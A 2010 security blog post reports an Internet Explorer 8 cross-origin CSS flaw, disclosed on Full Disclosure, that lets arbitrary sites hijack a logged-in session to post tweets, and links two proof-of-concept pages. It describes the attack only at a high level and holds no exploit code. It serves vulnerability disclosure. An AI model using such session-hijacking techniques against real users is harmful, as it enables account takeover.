You are here: Home / Security / Internet Explorer 8 | Arbitrary Sites allowed to tweet
New here? Get more useful information by subscribing for free to the RSS feed. Subscribe Now!
Sep
03
2010
2 Comments

Internet Explorer 8 | Arbitrary Sites allowed to tweet

A new vulnerability and Proof Of Concept (PoC) code has been posted to the Full Disclosure mailing list. Chris Evans says:

A nasty vulnerability exists in the latest Internet Explorer 8. I have been unsuccessful in persuading the vendor to issue a fix. The bug permits — for example — an arbitrary web site to force the victim to make tweets.

A harmless example has also been posted on his site (see below) 

http://scary.beasts.org/misc/twitter.html

This bug appears to be strictly related to Internet Explorer and no fault of Twitter. At this time there does not appear to be a resonable workaround.  This appears to be a Cross-origin CSS attack which uses the style sheet import to steal confidential information from a victim website, hijacking a user’s existing authenticated session.

Chris continues to state that there is evidence to suggest that Microsoft has been aware of this since at least 2008.

Update: another PoC has been posted:

http://skeptikal.org/exploits/twitter/twitter_xss.html

 

How long do we have to wait for a fix?

You can protect yourself by using NoScript, RequestPolicy, or other client-side protections.

Filed Under: Security

dman.com runs on the Genesis Framework

Genesis Theme Framework

Genesis empowers you to quickly and easily build incredible websites with WordPress. Whether you're a novice or advanced developer, Genesis provides the secure and search-engine-optimized foundation that takes WordPress to places you never thought it could go. It's that simple - start using Genesis now!

Take advantage of the 6 default layout options, comprehensive SEO settings, rock-solid security, flexible theme options, cool custom widgets, custom design hooks, and a huge selection of child themes ("skins") that make your site look the way you want it to. With automatic theme updates and world-class support included, Genesis is the smart choice for your WordPress website or blog.

Become a StudioPress Affiliate

About Dinesh Mistry

I am a full time Security Professional, Ethical Hacker, and overall technology enthusiast. I also enjoy working on Search Engine Optimization as time permits.

Comments

  1. J says:
    September 4, 2010 at 1:27 pm

    Very interesting article, yay for session-hijacking.

    Reply

Trackbacks

  1. Tweets that mention Internet Explorer 8 | Arbitrary Sites allowed to tweet -- Topsy.com says:
    September 3, 2010 at 11:12 pm

    [...] This post was mentioned on Twitter by Kelly Mistry, Dinesh Mistry. Dinesh Mistry said: New Post: Internet Explorer 8 | Arbitrary Sites allowed to tweet http://bit.ly/9tydR7 [...]

    Reply

Speak Your Mind

*

CAPTCHA Image

*